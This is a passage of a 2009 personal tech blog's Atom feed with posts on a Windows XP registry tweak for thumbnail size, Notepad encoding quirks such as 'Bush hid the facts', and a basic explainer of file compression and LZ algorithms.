href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3012224068428006973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3012224068428006973'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/ntfs-vs-fat.html' title='NTFS VS FAT'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SeCpopFfQxI/AAAAAAAAAGA/e36KQSL_vW4/s72-c/10_0_Gb_Hard_Disk-192.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2322515202721819358</id><published>2009-04-20T19:25:00.000-07:00</published><updated>2009-04-21T07:13:47.469-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Change the thumbnail size of photos in XP without any software</title><content type='html'>&lt;meta data=""&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Wanna change the thumbnail view size of your photos in XP .. !! This can be done by a simple registry trick without any software.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Follow the steps here to change the size :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ Open run -&gt; regedit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ In registry navigate to :&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sey-Zm7zQoI/AAAAAAAAAII/RiTluER_ccA/s1600-h/Thumbnail+view.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 337px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sey-Zm7zQoI/AAAAAAAAAII/RiTluER_ccA/s400/Thumbnail+view.jpg" alt="" id="BLOGGER_PHOTO_ID_5326841806429831810" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ In the right side box,&lt;b&gt; right click -&gt; new -&gt; DWORD Value&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ Give it the name &lt;b&gt;ThumbnailSize&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ Right click on &lt;b&gt;ThumbnailSize&lt;/b&gt; and click &lt;b&gt;modify&lt;/b&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/Sey_fooG5rI/AAAAAAAAAIY/TcE9zBgQ4Wo/s1600-h/Dword+value.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 324px; height: 196px;" src="http://3.bp.blogspot.com/_T53992hHLOM/Sey_fooG5rI/AAAAAAAAAIY/TcE9zBgQ4Wo/s400/Dword+value.jpg" alt="" id="BLOGGER_PHOTO_ID_5326843009474946738" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;+ Now change the value data to any number between &lt;b&gt;20 to 100 (in hexadecimal) or between 32 to 256 (in decimal)&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Done .. !! Your thumbnail size will change as your desired size.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sey-vB8HW0I/AAAAAAAAAIQ/Laip980AQjo/s1600-h/thumbnail+view+60.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 210px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sey-vB8HW0I/AAAAAAAAAIQ/Laip980AQjo/s400/thumbnail+view+60.jpg" alt="" id="BLOGGER_PHOTO_ID_5326842174456159042" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;                                                                                                                                         Thumbnail view at 60&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SezAAOMu1_I/AAAAAAAAAIg/ons6OgkXFdM/s1600-h/Thumbnailview+256jpg.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SezAAOMu1_I/AAAAAAAAAIg/ons6OgkXFdM/s400/Thumbnailview+256jpg.jpg" alt="" id="BLOGGER_PHOTO_ID_5326843569316485106" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;                                          Thumbnail view at 256&lt;br /&gt;&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2322515202721819358?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2322515202721819358/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/change-thumbnail-size-of-photos-in-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2322515202721819358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2322515202721819358'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/change-thumbnail-size-of-photos-in-xp.html' title='Change the thumbnail size of photos in XP without any software'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/Sey-Zm7zQoI/AAAAAAAAAII/RiTluER_ccA/s72-c/Thumbnail+view.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-632145779928204210</id><published>2009-04-20T10:15:00.000-07:00</published><updated>2009-04-20T10:23:09.359-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>NOTEPAD TRICKS</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeyuwRggXbI/AAAAAAAAAIA/hdhoy7m8fRA/s1600-h/Notepadicon.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 256px; height: 256px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeyuwRggXbI/AAAAAAAAAIA/hdhoy7m8fRA/s400/Notepadicon.png" alt="" id="BLOGGER_PHOTO_ID_5326824603629149618" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: left; font-family: arial; font-weight: bold;"&gt;Well quite old but here is d complete collection&lt;br /&gt;&lt;br /&gt;Step 1: Open Notepad&lt;br /&gt;Step 2: Write following line in the notepad.&lt;br /&gt;this app can break&lt;br /&gt;Step 3: Save this file as xxx.txt&lt;br /&gt;Step 4: Close the notepad.&lt;br /&gt;Step 5: Open the file again and c the magic&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;1&gt; Open Notepad&lt;br /&gt;2&gt; Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters&lt;br /&gt;3&gt; DON'T hit enter at the end of the line.&lt;br /&gt;4&gt; Save the file.&lt;br /&gt;5&gt; Close Notepad.&lt;br /&gt;6&gt; Reopen Notepad.&lt;br /&gt;7&gt; Open the file you just saved.&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;Open a note pad&lt;br /&gt;type Bush hid the facts&lt;br /&gt;save that file,&lt;br /&gt;close it&lt;br /&gt;again open and see...&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-632145779928204210?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/632145779928204210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/notepad-tricks.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/632145779928204210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/632145779928204210'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/notepad-tricks.html' title='NOTEPAD TRICKS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SeyuwRggXbI/AAAAAAAAAIA/hdhoy7m8fRA/s72-c/Notepadicon.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5401012303848202683</id><published>2009-04-19T02:40:00.000-07:00</published><updated>2009-04-19T03:44:24.138-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>FILE COMPRESSION</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sen1lHxQ1uI/AAAAAAAAAH4/821lhhnLHfQ/s1600-h/winrar.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 259px; height: 400px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sen1lHxQ1uI/AAAAAAAAAH4/821lhhnLHfQ/s400/winrar.jpg" alt="" id="BLOGGER_PHOTO_ID_5326058052431959778" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h1 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:1; 	font-size:24.0pt; 	font-family:"Times New Roman"; 	font-weight:bold;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:470247484; 	mso-list-template-ids:226811200;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l1 	{mso-list-id:1734114273; 	mso-list-template-ids:1902264720;} @list l1:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} @list l2 	{mso-list-id:1929383524; 	mso-list-template-ids:1746841604;} @list l2:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="font-family:arial;"&gt;If you download many programs and files off the Internet, you've probably encountered ZIP files before. This compression system was a path breaking &lt;span style=""&gt; &lt;/span&gt;invention, especially for Web users, because it lets you reduce the overall number of bits and bytes in a file so it can be transmitted faster over slower Internet connections, or take up less space on a disk. Once you download the file, your computer uses a program such as WinZip or Stuffit to expand the file back to its original size. If everything works correctly, the expanded file is identical to the original file before it was compressed. &lt;/p&gt;  &lt;p style="font-family: arial;" face="arial"&gt;At first glance, this seems very mysterious. How can you reduce the number of bits and bytes and then add those exact bits and bytes back later? As it turns out, the basic idea behind the process is fairly straightforward. In this article, I am going to tell you about thr basic concept behind this compression technique&lt;/p&gt;  &lt;p style="font-family: arial;" face="arial"&gt;Most types of computer files are fairly redundant -- they have the same information listed over and over again. File-compression programs simply get rid of the redundancy. Instead of listing a piece of information over and over again, a file-compression program lists that information once and then refers back to it whenever it appears in the original program. &lt;/p&gt;  &lt;p face="arial"&gt;As an example, let's look at a type of information we're all familiar with: words. &lt;/p&gt;  &lt;p face="arial"&gt;In John F. Kennedy's 1961 inaugural address, he delivered this famous line: &lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: center; font-family: arial;" align="center"&gt;&lt;em&gt;"Ask not what your country can do for you -- ask what you can do for your country."&lt;/em&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;The quote has 17 words, made up of 61 letters, 16 spaces, one dash and one period. If each letter, space or punctuation mark takes up one unit of memory, we get a total file size of 79 units. To get the file size down, we need to look for redundancies. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;Immediately, we notice that: &lt;/p&gt;  &lt;ul style="font-family: arial;" type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"ask"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"what"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"your"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"country"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"can"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"do"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"for"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;"you"      appears two times &lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p style="font-family: arial;"&gt;Ignoring the difference between capital and lower-case letters, roughly half of the phrase is redundant. Nine words -- ask, not, what, your, country, can, do, for, you -- give us almost everything we need for the entire quote. To construct the second half of the phrase, we just point to the words in the first half and fill in the spaces and punctuation. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;We'll look at how file-compression systems deal with redundancy in more detail in the next section. &lt;/p&gt;  &lt;h1 style="font-family: arial;"&gt;&lt;span style="font-size:130%;"&gt;Redundancy and Algorithms&lt;/span&gt;&lt;/h1&gt;  &lt;p style="font-family: arial;"&gt;Most compression programs use a variation of the &lt;strong&gt;LZ adaptive dictionary-based algorithm&lt;/strong&gt; to shrink files. "LZ" refers to &lt;strong&gt;Lempel and Ziv&lt;/strong&gt;, the algorithm's creators, and "dictionary" refers to the method of &lt;strong&gt;cataloging&lt;/strong&gt; pieces of data. 